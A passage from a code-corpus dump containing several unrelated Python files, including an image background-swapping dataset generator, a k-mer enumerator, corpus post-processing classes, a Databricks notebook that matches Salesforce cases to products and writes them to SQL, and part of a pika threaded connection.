target_img by expanding/shrinking and\n cropping appropriately.\n\n If source_img's dimensions are strictly greater than or equal to the\n corresponding target img dimensions, we crop left/right or top/bottom\n depending on aspect ratio, then shrink down.\n\n If any of source img's dimensions are smaller than target img's dimensions,\n we expand the source img and then crop accordingly\n\n Modified from\n https://stackoverflow.com/questions/4744372/reducing-the-width-height-of-an-image-to-fit-a-given-aspect-ratio-how-python\n \"\"\"\n source_width = source_img.size[0]\n source_height = source_img.size[1]\n\n target_width = target_img.size[0]\n target_height = target_img.size[1]\n\n # Check if source does not completely cover target\n if (source_width < target_width) or (source_height < target_height):\n # Try matching width\n width_resize = (target_width, int((target_width / source_width) * source_height))\n if (width_resize[0] >= target_width) and (width_resize[1] >= target_height):\n source_resized = source_img.resize(width_resize, Image.ANTIALIAS)\n else:\n height_resize = (int((target_height / source_height) * source_width), target_height)\n assert (height_resize[0] >= target_width) and (height_resize[1] >= target_height)\n source_resized = source_img.resize(height_resize, Image.ANTIALIAS)\n # Rerun the cropping\n return crop_and_resize(source_resized, target_img)\n\n source_aspect = source_width / 
source_height\n target_aspect = target_width / target_height\n\n if source_aspect > target_aspect:\n # Crop left/right\n new_source_width = int(target_aspect * source_height)\n offset = (source_width - new_source_width) // 2\n resize = (offset, 0, source_width - offset, source_height)\n else:\n # Crop top/bottom\n new_source_height = int(source_width / target_aspect)\n offset = (source_height - new_source_height) // 2\n resize = (0, offset, source_width, source_height - offset)\n\n source_resized = source_img.crop(resize).resize((target_width, target_height), Image.ANTIALIAS)\n return source_resized\n\n\ndef combine_and_mask(img_new, mask, img_black):\n \"\"\"\n Combine img_new, mask, and image_black based on the mask\n\n img_new: new (unmasked image)\n mask: binary mask of bird image\n img_black: already-masked bird image (bird only)\n \"\"\"\n # Warp new img to match black img\n img_resized = crop_and_resize(img_new, img_black)\n img_resized_np = np.asarray(img_resized)\n\n # Mask new img\n img_masked_np = np.around(img_resized_np * (1 - mask)).astype(np.uint8)\n\n # Combine\n img_combined_np = np.asarray(img_black) + img_masked_np\n img_combined = Image.fromarray(img_combined_np)\n\n return img_combined\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\n\n parser = ArgumentParser(\n description='Make segmentations',\n formatter_class=ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--cub_dir', default='../CUB_200_2011/', help='Path to CUB (should also contain segmentations folder)')\n parser.add_argument('--places_dir', default='../places365/', help='Path to Places365 dataset')\n parser.add_argument('--places_split', default='val_large', help='Which Places365 split to use (folder in --places_dir)')\n parser.add_argument('--places_file', default='places365_val.txt', help='Filepath to list of places images and classes (file in --places_dir)')\n parser.add_argument('--out_dir', default='.', help='Output directory')\n parser.add_argument('--black_dirname', default='CUB_black', help='Name of black dataset: black background for each image')\n parser.add_argument('--random_dirname', default='CUB_random', help='Name of random dataset: completely random place sampled for each image')\n parser.add_argument('--fixed_dirname', default='CUB_fixed', help='Name of fixed dataset: class <-> place association fixed at train, swapped at test (but still class associated)')\n parser.add_argument('--fixedrandom_dirname', default='CUB_fixedrandom', help='Name of fixed-random dataset: class <-> place association fixed at train, random at test')\n parser.add_argument('--max_fixed_img', default=None, type=int, help='Maximum # of images to have per class in fixed settings')\n parser.add_argument('--train_json_file', default='/u/scr/muj/CloserLookFewShot/custom_filelists/CUB/base.json')\n parser.add_argument('--seed', type=int, default=42, help='Random seed')\n\n args = parser.parse_args()\n\n # If max_fixed_img is specified, change fixed/fixedrandom dirnames\n if args.max_fixed_img is not None:\n args.fixed_dirname = '{}_{}'.format(args.fixed_dirname, args.max_fixed_img)\n args.fixedrandom_dirname = '{}_{}'.format(args.fixedrandom_dirname, args.max_fixed_img)\n\n np.random.seed(args.seed)\n\n # Get species\n img_dir = os.path.join(args.cub_dir, 'images')\n seg_dir = os.path.join(args.cub_dir, 'segmentations')\n species = sorted(os.listdir(img_dir))\n\n # Make output directory\n os.makedirs(args.out_dir, exist_ok=True)\n\n # Get list of places\n places_dict 
= get_places(os.path.join(args.places_dir, args.places_file))\n\n # Full paths\n places_dict = {k: [os.path.join(args.places_dir, args.places_split, p) for p in v]\n for k, v in places_dict.items()}\n # For fixed images, restrict number of unique images\n if args.max_fixed_img is not None:\n places_dict_sub = {k: v[:args.max_fixed_img] for k, v in places_dict.items()}\n else:\n places_dict_sub = places_dict\n\n # Flat list of places - no size restrictions\n all_places = [item for sublist in places_dict.values() for item in sublist]\n assert all(os.path.exists(p) and p.endswith('.jpg') for p in all_places)\n # Iterate through places\n all_places_i = 0\n np.random.shuffle(all_places)\n\n # Arbitrarily map places class to birds class\n sampled_places = np.random.choice(list(places_dict.keys()), size=len(species), replace=False)\n s2p_train = {s: int(p) for s, p in zip(species, sampled_places)}\n # Shift sampled places at test\n s2p_test = {s: int(p) for s, p in zip(species, np.roll(sampled_places, 1))}\n\n # Load training classes\n with open(args.train_json_file, 'r') as f:\n train_json = json.load(f)\n train_labels = list(set(train_json['image_labels']))\n train_labels = [train_json['label_names'][i] for i in train_labels]\n # Get the places sampled for training classes\n train_places = [s2p_train[t] for t in train_labels]\n # Use restricted for fixed\n all_sampled_places = [places_dict_sub[p] for p in train_places]\n all_sampled_places = [item for sublist in all_sampled_places for item in sublist]\n np.random.shuffle(all_sampled_places)\n\n for spc in tqdm(species, desc='Classes'):\n spc_img_dir = os.path.join(img_dir, spc)\n spc_seg_dir = os.path.join(seg_dir, spc)\n\n # List images in species\n spc_img = sorted(os.listdir(spc_img_dir))\n spc_seg = sorted(os.listdir(spc_seg_dir))\n\n # Make sure directory files align\n assert all(i.endswith('.jpg') for i in spc_img)\n assert all(i.endswith('.png') for i in spc_seg)\n assert all(os.path.splitext(x)[0] == os.path.splitext(y)[0] for x, y in zip(spc_img, spc_seg))\n\n # New output directories\n spc_black_dir = os.path.join(args.out_dir, args.black_dirname, spc)\n spc_random_dir = os.path.join(args.out_dir, args.random_dirname, spc)\n spc_train_dir = os.path.join(args.out_dir, args.fixed_dirname, 'train', spc)\n spc_test_dir = os.path.join(args.out_dir, args.fixed_dirname, 'test', spc)\n spc_fixedrandom_dir = os.path.join(args.out_dir, args.fixedrandom_dirname, spc)\n\n os.makedirs(spc_black_dir, exist_ok=True)\n os.makedirs(spc_random_dir, exist_ok=True)\n os.makedirs(spc_train_dir, exist_ok=True)\n os.makedirs(spc_test_dir, exist_ok=True)\n os.makedirs(spc_fixedrandom_dir, exist_ok=True)\n\n # Get fixed places for this species\n train_place = s2p_train[spc]\n test_place = s2p_test[spc]\n # Don't replace if we have enough images\n replace = len(spc_img) > len(places_dict_sub[train_place])\n train_place_imgs = np.random.choice(places_dict_sub[train_place], size=len(spc_img), replace=replace)\n test_place_imgs = np.random.choice(places_dict_sub[test_place], size=len(spc_img), replace=replace)\n\n # (image, segmentation, train place, test place\n it = zip(spc_img, spc_seg, train_place_imgs, test_place_imgs)\n\n for img_path, seg_path, train_place_path, test_place_path in tqdm(it, desc='Images', total=len(spc_img)):\n full_img_path = os.path.join(spc_img_dir, img_path)\n full_seg_path = os.path.join(spc_seg_dir, seg_path)\n\n # Load images\n img_np = np.asarray(Image.open(full_img_path).convert('RGB'))\n # Turn into opacity filter\n seg_np = 
np.asarray(Image.open(full_seg_path).convert('RGB')) / 255\n\n # Black background\n img_black_np = np.around(img_np * seg_np).astype(np.uint8)\n\n full_black_path = os.path.join(spc_black_dir, img_path)\n img_black = Image.fromarray(img_black_np)\n img_black.save(full_black_path)\n\n # Random background\n # Fixed/random background\n fixedrandom_place_path = all_sampled_places[all_places_i]\n random_place_path = all_places[all_places_i]\n all_places_i += 1\n if all_places_i >= len(all_sampled_places):\n # Reset counter, re-shuffle images\n all_places_i = 0\n np.random.shuffle(all_sampled_places)\n random_place = Image.open(random_place_path).convert('RGB')\n fixedrandom_place = Image.open(fixedrandom_place_path).convert('RGB')\n\n img_random = combine_and_mask(random_place, seg_np, img_black)\n full_random_path = os.path.join(spc_random_dir, img_path)\n img_random.save(full_random_path)\n\n # Fixed background\n train_place = Image.open(train_place_path).convert('RGB')\n test_place = Image.open(test_place_path).convert('RGB')\n\n img_train = combine_and_mask(train_place, seg_np, img_black)\n img_test = combine_and_mask(test_place, seg_np, img_black)\n\n full_train_path = os.path.join(spc_train_dir, img_path)\n img_train.save(full_train_path)\n full_test_path = os.path.join(spc_test_dir, img_path)\n img_test.save(full_test_path)\n\n img_fixedrandom = combine_and_mask(fixedrandom_place, seg_np, img_black)\n full_fixedrandom_path = os.path.join(spc_fixedrandom_dir, img_path)\n img_fixedrandom.save(full_fixedrandom_path)\n\n # Save fixed class/image metadata\n # TODO: Should probably record individual places images too\n fixed_dir = os.path.join(args.out_dir, args.fixed_dirname)\n with open(os.path.join(fixed_dir, 'train_places.json'), 'w') as f:\n json.dump(s2p_train, f, sort_keys=True, indent=4)\n with open(os.path.join(fixed_dir, 'test_places.json'), 'w') as f:\n json.dump(s2p_test, f, sort_keys=True, indent=4)\n","sub_path":"filelists/CUB/gen_cub_adversarial.py","file_name":"gen_cub_adversarial.py","file_ext":"py","file_size_in_byte":11963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"623645647","text":"def enumKMers(sequence, length, kmers = []):\n # Return kmers is length is <= 0 so as not not wrongly extend the length of\n # kmers further\n if length <= 0:\n return kmers\n\n # Enables the function to be called without initial empty list of kmers\n if kmers == []:\n\n # Set kmers == sequence and decrement length by 1\n return enumKMers(sequence, length - 1, sequence)\n\n # Takes care of base case where length == 1\n if length == 1:\n output = []\n for kmer in kmers:\n # Append the original kmer to output\n output.append(kmer)\n for seq in sequence:\n output.append(kmer + seq)\n return output\n\n # General case where length > 1\n else:\n output = []\n for kmer in kmers:\n # Append the original kmer to output\n output.append(kmer)\n for seq in sequence:\n output += enumKMers(sequence, length - 1, [kmer + seq])\n return output\n\nif __name__ == \"__main__\":\n\n # Read input file\n f = open(\"inputs/LEXV.in\", \"r\")\n\n # Read first line of input file, sequence\n sequence = f.readline().replace(\"\\n\",\"\").split(\" \")\n\n # Read second line of input file, length of kmer\n n = int(f.readline().replace(\"\\n\",\"\"))\n\n # Generate lexicographically sorted kmers\n kmers = enumKMers(sequence, n)\n\n # Output to file\n output = open(\"outputs/LEXV.out\", \"w\", newline=\"\\n\")\n for kmer in kmers:\n 
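# kmers is already in lexicographic order w.r.t. the symbol order given on the\n # input's first line: the recursion emits each prefix before its extensions.\n 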
output.write(\"{}\\n\".format(kmer))\n","sub_path":"Bioinformatics_Stronghold/LEXV_Ordering_strings_of_different_lengths_lexicographically.py","file_name":"LEXV_Ordering_strings_of_different_lengths_lexicographically.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"445269607","text":"if False:\n from .configs import CorpusConfiguration\nimport tempfile\nimport regex as re\nfrom xml.etree.ElementTree import Element\nimport csv\nfrom typing import List, ClassVar, Tuple, Dict\nfrom abc import ABC, abstractmethod\nfrom collections import namedtuple\n\n\nclass PostProcessing(ABC):\n NodeName = \"XML-NODE-LOCAL-NAME\" # Name of the node to match\n\n @abstractmethod\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n raise NotImplementedError\n\n @abstractmethod\n def from_xml(cls, node: Element) -> ClassVar[\"PostProcessing\"]:\n raise NotImplementedError\n\n @classmethod\n def match_config_node(cls, node: Element) -> bool:\n \"\"\" If the current node is representing the current object, returns True\n \"\"\"\n return node.tag == cls.NodeName\n\n\nclass ApplyTo:\n def __init__(self, source: str, target: List[str]):\n self.source: str = source\n self.target: List[str] = target\n\n @staticmethod\n def from_xml(apply_to_node: Element) -> \"ApplyTo\":\n return ApplyTo(\n source=apply_to_node.attrib[\"source\"],\n target=[str(node.text).strip() for node in apply_to_node.findall(\"./target\")]\n )\n\n\nclass Disambiguation(PostProcessing):\n NodeName = \"disambiguation\"\n\n def __init__(self, lemma_key: str, disambiguation_key: str, match_pattern: str,\n default_value: str, glue: str, keep: bool = False):\n super(Disambiguation, self).__init__()\n self.lemma_key: str = lemma_key\n self.disambiguation_key: str = disambiguation_key\n self.match_pattern: re.Regex = re.compile(match_pattern)\n self.keep: bool = keep\n self.default_value: str = default_value\n self.glue: str = glue\n\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n temp = tempfile.TemporaryFile(mode=\"w+\") # 2\n\n try:\n with open(file_path) as file:\n csv_reader = csv.reader(file, delimiter=config.column_marker)\n header: List[str] = []\n for nb_line, line in enumerate(csv_reader): # The file should already have been open\n if nb_line == 0:\n temp.write(config.column_marker.join(line+[self.disambiguation_key])+\"\\n\")\n header = line\n continue\n elif not line:\n temp.write(\"\\n\")\n continue\n lines = dict(zip(header, line))\n\n found = self.match_pattern.findall(lines[self.lemma_key])\n if found:\n lines[self.disambiguation_key] = found[0]\n if not isinstance(found[0], str):\n lines[self.disambiguation_key] = self.glue.join(found[0])\n if not self.keep: # If we do not keep the original value, we remove it\n lines[self.lemma_key] = self.match_pattern.sub(\"\", lines[self.lemma_key])\n else:\n lines[self.disambiguation_key] = self.default_value\n temp.write(config.column_marker.join(list(lines.values()))+\"\\n\")\n with open(file_path, \"w\") as f:\n temp.seek(0)\n f.write(temp.read())\n finally:\n temp.close() # 5\n\n @classmethod\n def from_xml(cls, node: Element) -> \"Disambiguation\":\n return cls(\n lemma_key=node.attrib[\"source\"],\n disambiguation_key=node.attrib[\"new-column\"],\n match_pattern=node.attrib[\"matchPattern\"],\n keep=\"keep\" in node.attrib,\n default_value=node.attrib.get(\"default\", \"_\"),\n glue=node.attrib.get(\"join\", \"|\")\n )\n\n\nclass 
ReplacementSet(PostProcessing):\n \"\"\" Using a regular expression, replaces values in certain columns\n \"\"\"\n NodeName = \"replacement\"\n\n def __init__(\n self, match_pattern: str, replacement_pattern: str,\n applies_to: List[ApplyTo]\n ):\n super(ReplacementSet, self).__init__()\n self.match_pattern: re.Regex = re.compile(match_pattern)\n self.replacement_pattern: str = replacement_pattern\n self.applies_to: List[ApplyTo] = applies_to\n\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n temp = tempfile.TemporaryFile(mode=\"w+\")\n try:\n with open(file_path) as file:\n csv_reader = csv.reader(file, delimiter=config.column_marker)\n header: List[str] = []\n for nb_line, line in enumerate(csv_reader): # The file should already have been open\n if nb_line == 0:\n temp.write(config.column_marker.join(line)+\"\\n\")\n header = line\n continue\n elif not line:\n temp.write(\"\\n\")\n continue\n lines = dict(zip(header, line))\n\n for apply_to in self.applies_to:\n if self.match_pattern.search(lines[apply_to.source]):\n for target in apply_to.target:\n # If source and target are the same, we simply replace source by target\n if apply_to.source == target:\n lines[apply_to.source] = self.match_pattern.sub(\n self.replacement_pattern,\n lines[apply_to.source]\n )\n else: # Otherwise, we just set the target value using this value\n lines[target] = self.replacement_pattern\n\n temp.write(config.column_marker.join(list(lines.values()))+\"\\n\")\n with open(file_path, \"w\") as f:\n temp.seek(0)\n f.write(temp.read())\n finally:\n temp.close() # 5\n\n @classmethod\n def from_xml(cls, node: Element) -> \"ReplacementSet\":\n return ReplacementSet(\n match_pattern=node.attrib[\"matchPattern\"],\n replacement_pattern=node.attrib[\"replacementPattern\"],\n applies_to=[ApplyTo.from_xml(apply_to) for apply_to in node.findall(\"applyTo\")]\n )\n\n\nclass Skip(PostProcessing):\n \"\"\" If the matchPattern matches target column, the line is removed from the post-processed output\n \"\"\"\n NodeName = \"skip\"\n\n def __init__(\n self, match_pattern: str, source: str\n ):\n super(Skip, self).__init__()\n self.match_pattern: re.Regex = re.compile(match_pattern)\n self.source: str = source\n\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n temp = tempfile.TemporaryFile(mode=\"w+\") # 2\n\n try:\n with open(file_path) as file:\n csv_reader = csv.reader(file, delimiter=config.column_marker)\n header: List[str] = []\n for nb_line, line in enumerate(csv_reader): # The file should already have been open\n if nb_line == 0:\n temp.write(config.column_marker.join(line)+\"\\n\")\n header = line\n continue\n elif not line:\n temp.write(\"\\n\")\n continue\n\n lines = dict(zip(header, line))\n\n # If it matches, we skip it\n if self.match_pattern.search(lines[self.source]):\n continue\n\n temp.write(config.column_marker.join(list(lines.values()))+\"\\n\")\n\n with open(file_path, \"w\") as f:\n temp.seek(0)\n f.write(temp.read())\n finally:\n temp.close() # 5\n\n @classmethod\n def from_xml(cls, node: Element) -> \"Skip\":\n return Skip(\n match_pattern=node.attrib[\"matchPattern\"],\n source=node.attrib[\"source\"]\n )\n\n\nclass Clitic(PostProcessing):\n \"\"\" If the matchPattern matches target column, the line is removed from the post-processed output\n \"\"\"\n NodeName = \"clitic\"\n\n Transfer = namedtuple(\"Transfer\", [\"col\", \"glue\"])\n\n def __init__(\n self, match_pattern: str, source: str, glue: str, transfers: List[Tuple[str, bool]]\n ):\n super(Clitic, 
self).__init__()\n self.match_pattern: re.Regex = re.compile(match_pattern)\n self.source: str = source\n self.glue = glue\n _tr = {False: \"\", True: self.glue}\n self.transfers: List[Clitic.Transfer] = [\n Clitic.Transfer(key, _tr[has_glue])\n for key, has_glue in transfers\n ]\n\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n temp = tempfile.TemporaryFile(mode=\"w+\") # 2\n default = (\"\", \"\")\n try:\n with open(file_path) as file:\n csv_reader = csv.reader(file, delimiter=config.column_marker)\n header: List[str] = []\n sequence = []\n # [Int = Line to apply modifications to, Dict[Column name, Tuple[Glue, Value]]]\n modifications: List[Tuple[int, Dict[str, Tuple[str, str]]]] = []\n for nb_line, line in enumerate(csv_reader): # The file should already have been open\n if nb_line == 0:\n temp.write(config.column_marker.join(line)+\"\\n\")\n header = line\n continue\n elif not line:\n for target_line, modif in modifications:\n sequence[target_line] = {\n column: modif.get(column, default)[0].join(\n [value, modif.get(column, default)[1]]\n )\n for column, value in sequence[target_line].items()\n }\n temp.write(\"\\n\".join([\n config.column_marker.join(list(l.values()))\n for l in sequence\n ])+\"\\n\")\n sequence = []\n modifications = []\n continue\n\n lines = dict(zip(header, line))\n\n # If it matches, we give it to the previous / original line\n if self.match_pattern.match(lines[self.source]):\n modifications.append(\n (\n len(sequence) - 1 - len(modifications),\n {key: (keep, lines[key]) for (key, keep) in self.transfers}\n )\n )\n continue\n\n # config.column_marker.join(list(lines.values()))\n sequence.append(lines)\n\n with open(file_path, \"w\") as f:\n temp.seek(0)\n f.write(temp.read())\n finally:\n temp.close() # 5\n\n @classmethod\n def from_xml(cls, node: Element) -> \"Clitic\":\n return cls(\n match_pattern=node.attrib[\"matchPattern\"],\n source=node.attrib[\"source\"],\n glue=node.attrib[\"glue_char\"],\n transfers=[\n (\n tr.text,\n tr.attrib.get(\"no-glue-char\", \"false\").lower() == \"false\"\n )\n for tr in node.findall(\"transfer\")\n ]\n )\n","sub_path":"protogenie/postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":11663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"167703568","text":"# Databricks notebook source\n# Databricks notebook source\nc_value=dbutils.widgets.get(\"to_be_checked\")\nhistory_flag=dbutils.widgets.get(\"history_flag\")\n\n# COMMAND ----------\n\n# Databricks notebook source\ndef SQL_connection(server,database,username,password):\n import pyodbc\n import configparser\n import traceback\n\n config = configparser.ConfigParser()\n #This configuration path should be configured in Blob storage\n config.read(\"/dbfs/mnt/momentive-configuration/config-file.ini\")\n\n server = config.get('sql_db', server)\n database = config.get('sql_db', database)\n username = config.get('sql_db', username)\n password = config.get('sql_db', password)\n \n\n driver= \"{ODBC Driver 17 for SQL Server}\"\n connection_string = 'DRIVER=' + driver + \\\n ';SERVER=' + server + \\\n ';PORT=1433' + \\\n ';DATABASE=' + database + \\\n ';UID=' + username + \\\n ';PWD=' + password\n\n try:\n sql_conn = pyodbc.connect(connection_string)\n return sql_conn\n # execute query and save data in pandas df\n except Exception as error:\n print(\" \\u2717 error message: {}\".format(error))\n # I found that traceback prints much more detailed 
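
The Disambiguation, ReplacementSet, Skip, and Clitic post-processors above all share one mechanic: stream the corpus through csv.reader, write transformed rows into a TemporaryFile, then copy the buffer back over the source file. A minimal standalone sketch of that pattern, where the tab delimiter and the transform callback are illustrative assumptions rather than protogenie's actual API:

    import csv
    import tempfile

    def rewrite_in_place(path, transform, delimiter="\t"):
        # Buffer the rewritten rows, then overwrite the original in one pass,
        # mirroring the apply() methods above.
        with tempfile.TemporaryFile(mode="w+") as temp:
            with open(path) as src:
                for row in csv.reader(src, delimiter=delimiter):
                    row = transform(row)
                    if row is not None:  # returning None drops the line, like Skip
                        temp.write(delimiter.join(row) + "\n")
            temp.seek(0)
            with open(path, "w") as dst:
                dst.write(temp.read())
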
error message\n traceback.print_exc()\n\n\n# COMMAND ----------\n\ndef adding_matched_values(temp_df,category_type,indx,value,subct):\n try:\n indx=int(indx)\n matched_category=''\n matched_column=''\n if category_type == \"MATNBR\":\n if indx==0:\n matched_category=\"MATERIAL NUMBER\"\n matched_column=\"Text1\" \n elif indx==1:\n matched_category=\"REAL-SPECID\"\n matched_column=\"Text2\" \n else:\n matched_category=\"BDT\"\n matched_column=\"Text3\"\n\n elif category_type == \"NAMPROD\":\n if indx==0:\n matched_category=\"NAMPROD\"\n matched_column=\"Text1\" \n elif indx==1 and subct==\"REAL_SUB\":\n matched_category=\"REAL-SPECID\"\n matched_column=\"Text2\" \n elif indx==1 and subct==\"PURE_SUB\":\n matched_category=\"PURE-SPECID\"\n matched_column=\"Text2\" \n else:\n matched_category=\"SYNONYMS\"\n matched_column=\"Text3\"\n elif category_type == \"NUMCAS\":\n if indx==0:\n matched_category=\"NUMCAS\"\n matched_column=\"Text1\" \n elif indx==1 and subct==\"REAL_SUB\":\n matched_category=\"REAL-SPECID\"\n matched_column=\"Text2\" \n elif indx==1 and subct==\"PURE_SUB\":\n matched_category=\"PURE-SPECID\"\n matched_column=\"Text2\" \n else:\n matched_category=\"CHEMICAL NAME\"\n matched_column=\"Text3\"\n# print(\"matched_category\",matched_category)\n# print(\"matched_column\",matched_column)\n temp_df[\"MatchedColumn\"]=matched_column\n temp_df[\"MatchedCategory\"]=matched_category\n temp_df[\"MatchedValue\"]=value\n return temp_df\n except Exception as e:\n print(\"error in adding matched_values\",e)\n\n# COMMAND ----------\n\nimport multiprocessing as mp\nfrom multiprocessing.pool import ThreadPool\nimport datetime\nimport os\nimport re\nimport pandas as pd\nimport configparser\nimport datetime\n\ncurrent_date = str(datetime.datetime.now())\ndate = current_date[:10]\nconfig = configparser.ConfigParser()\n#This configuration path should be configured in Blob storage\nconfig.read(\"/dbfs/mnt/momentive-configuration/config-file.ini\")\nhistory_filename = config.get('mnt_sales_force','mnt_sales_force_historical_filename')\nincremental_filename = config.get('mnt_sales_force','mnt_sales_force_incremental_filename')\nif history_flag =='false':\n filename=incremental_filename\nelse:\n filename=history_filename\nsfdc_text_folder = config.get('mnt_sales_force','mnt_sales_force_split_files')\nsfdc_extract_column = config.get('mnt_sales_force',\"mnt_sales_force_extract_column\")\nsfdc_column = sfdc_extract_column.split(\",\")\n# inscope_sfdc_info_df=pd.read_csv('/dbfs/mnt/momentive-sources-pih/sales-force/backup/test.csv',encoding=\"ISO-8859-1\")\ninscope_sfdc_info_df=pd.read_csv(sfdc_text_folder+filename+\".csv\",encoding=\"ISO-8859-1\")\nprint(\"processing file length - \",len(inscope_sfdc_info_df))\n#Connecting SQL db to get SFDC data\nsql_cursor = SQL_connection(\"server\",\"database\",\"username\",\"password\")\ncursor=sql_cursor.cursor()\nadding_custom_column=['MatchedColumn','MatchedCategory','MatchedValue']\ncvalue=c_value.split(\",\")\noutput_str = \"|\".join(cvalue)\noutput_str=str(output_str[:-2])\nprint(\"row --> \",cvalue)\noutput_df=pd.DataFrame()\ncustom_validate=[\"validate_category\"]\nstatus=''\n\ndef concurrent_function(cvalue):\n try:\n global output_df\n validate=\"validate_category\" \n item=cvalue[1]\n category_type=cvalue[0]\n subct=cvalue[2]\n indx=cvalue[3]\n org_value=str(item) \n value=org_value.strip().lower()\n if value.isdigit() and len(value)>0 : \n value=int(value)\n rgx = re.compile(r'((?<![0-9]){}(?![0-9]))'.format(value))\n re_match=inscope_sfdc_info_df[inscope_sfdc_info_df[validate].str.contains(rgx,na=False)]\n if len(re_match)>1: \n
digit_match_row=adding_matched_values(re_match,category_type,indx,org_value,subct)\n output_df=pd.concat([output_df,digit_match_row])\n elif len(value)>0 and (\"?\" not in value and \"!\" not in value):\n value=value.replace(\"silopren*\",'')\n e_value=value.replace(\"*\",'')\n e_value=e_value.replace(\"®\",'')\n whole_match=pd.DataFrame()\n w_rgx = re.compile(r\"(([^a-zA-Z]|^){}([^a-zA-Z]|$))\".format(e_value),re.I)\n whole_match=inscope_sfdc_info_df[inscope_sfdc_info_df[validate].str.contains(w_rgx,na=False)] \n if len(whole_match)>0:\n string_match_column=adding_matched_values(whole_match,category_type,indx,org_value,subct)\n output_df=pd.concat([output_df,string_match_column])\n except Exception as e:\n print(\"value error\",e)\n\ntry:\n concurrent_function(cvalue)\n # inserting into sfdc indentified table\n if len(output_df)>0:\n output_df.drop_duplicates(inplace=True)\n output_df=output_df[(sfdc_column+adding_custom_column)]\n output_df=output_df.fillna(\"NULL\")\n output_df=output_df.replace({\"None\":\"NULL\"})\n cursor=sql_cursor.cursor()\n output_list = output_df.values.tolist()\n for row in output_list:\n try: \n insert_data=''\n for item in row:\n item=str(item)\n if \"'\" in item:\n item=item.replace(\"'\",\"''\")\n insert_data+=\"'\"+item+\"',\"\n if len(insert_data)>0:\n insert_data=insert_data[:-1]\n insert_query=\"insert into [momentive].[sfdc_identified_case] values (\"+insert_data+\")\"\n cursor.execute(insert_query)\n sql_cursor.commit()\n status=output_str+\" --> \"+str(len(output_list))+\" case detail(s) found\"\n except Exception as e:\n status=output_str+\" --> Oops error found while inserting\"+str(e)\n dbutils.notebook.exit(status) \n else:\n status=output_str+\" --> 0 case detail found\"\n \nexcept Exception as e:\n status=output_str+\" --> Oops error found in processing\"+str(e)\n dbutils.notebook.exit(status)\n \ndbutils.notebook.exit(status)\n","sub_path":"notebooks/Users/admomanickamm@momentive.onmicrosoft.com/sfdc_parallel.py","file_name":"sfdc_parallel.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"114488348","text":"\"\"\"Thread connection\"\"\"\nimport logging\nimport socket\nimport threading\n\nimport time\n\nimport pika\nfrom pika import frame, exceptions\nfrom pika.adapters.thread_channel import ThreadConnectionChannel\nfrom pika.adapters.thread_connection_io import ThreadConnectionIO\nfrom pika.adapters.transport import Transport\nimport pika.spec as spec\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass CloseableThread(threading.Thread):\n def __init__(self, name):\n super(CloseableThread, self).__init__(name=name)\n self._stop = threading.Event()\n self.daemon = True\n\n def stop(self):\n self._stop.set()\n\n def run(self):\n while not self._stop.isSet():\n try:\n self._run0()\n except Exception as e:\n LOGGER.error(e)\n\n def _run0(self):\n raise NotImplementedError\n\n\nclass HeartbeatSender(CloseableThread):\n def __init__(self, connection):\n super(HeartbeatSender, self).__init__(\"HeartbeatThread\")\n self._connection = connection\n self.last_activity_time = 0\n self.heartbeat = 0\n\n def _run0(self):\n self._send_heartbeat_frame()\n\n def signal_activity(self):\n self.last_activity_time = int(round(time.time()))\n\n def _send_heartbeat_frame(self):\n now = int(round(time.time()))\n if now > (self.last_activity_time + self.heartbeat):\n LOGGER.debug(\"Sending heartbeat frame\")\n self._connection.send_frame(frame.Heartbeat())\n\n def 
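
The matching in concurrent_function above hinges on pandas str.contains accepting a pre-compiled, case-insensitive pattern whose ([^a-zA-Z]|^) and ([^a-zA-Z]|$) wrappers approximate word boundaries. A self-contained illustration with made-up data; re.escape is added here for safety, while the notebook formats raw values in:

    import re
    import pandas as pd

    df = pd.DataFrame({"validate_category": ["Silopren X100 resin", "AX1000 blend", None]})
    term = "x100"
    rgx = re.compile(r"(([^a-zA-Z]|^){}([^a-zA-Z]|$))".format(re.escape(term)), re.I)
    # na=False keeps NaN rows out of the boolean mask, as in the notebook.
    print(df[df["validate_category"].str.contains(rgx, na=False)])
    # -> only "Silopren X100 resin"; "AX1000" fails the boundary test
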
setHeartbeat(self, heartbeat):\n self.heartbeat = heartbeat\n\n\nclass ThreadConnectionMainLoop(CloseableThread):\n def __init__(self, connection):\n super(ThreadConnectionMainLoop, self).__init__(\"MainLoop\")\n self._connection = connection\n\n def _run0(self):\n (_frame_type, _channel, _payload, read_frame_buffer) = self._connection.read_frame()\n _consumed_count, frame_value = frame.decode_frame(read_frame_buffer)\n if isinstance(frame_value, frame.Heartbeat):\n LOGGER.debug(\"receive heartbeat\")\n elif isinstance(frame_value, frame.Method) and (isinstance(frame_value.method, spec.Basic.Ack) or\n isinstance(frame_value.method, spec.Basic.Nack)):\n # in publisher-acknowledgments mode\n self._connection.deliver_pub_ack(frame_value)\n else:\n self._connection.deliver_frame(frame_value)\n\n\nclass ThreadConnection(ThreadConnectionIO):\n def __init__(self, parameters=None):\n super(ThreadConnection, self).__init__(self)\n self.parameters = parameters\n self.server_properties = None\n self.client_properties = {\n 'product': pika.connection.PRODUCT,\n 'platform': 'Python %s' % pika.connection.platform.python_version(),\n 'capabilities': {\n 'authentication_failure_close': True,\n 'basic.nack': True,\n 'connection.blocked': True,\n 'consumer_cancel_notify': True,\n 'publisher_confirms': True\n },\n 'information': 'See http://pika.rtfd.org',\n 'version': pika.connection.__version__\n }\n if parameters.client_properties:\n self.client_properties.update(parameters.client_properties)\n\n self.channels = dict()\n self.channel_number0 = 0\n\n self._transport = Transport(parameters.host, parameters.port, parameters.socket_timeout,\n parameters.ssl,\n sslopts=parameters.ssl_options)\n self._try_connect()\n 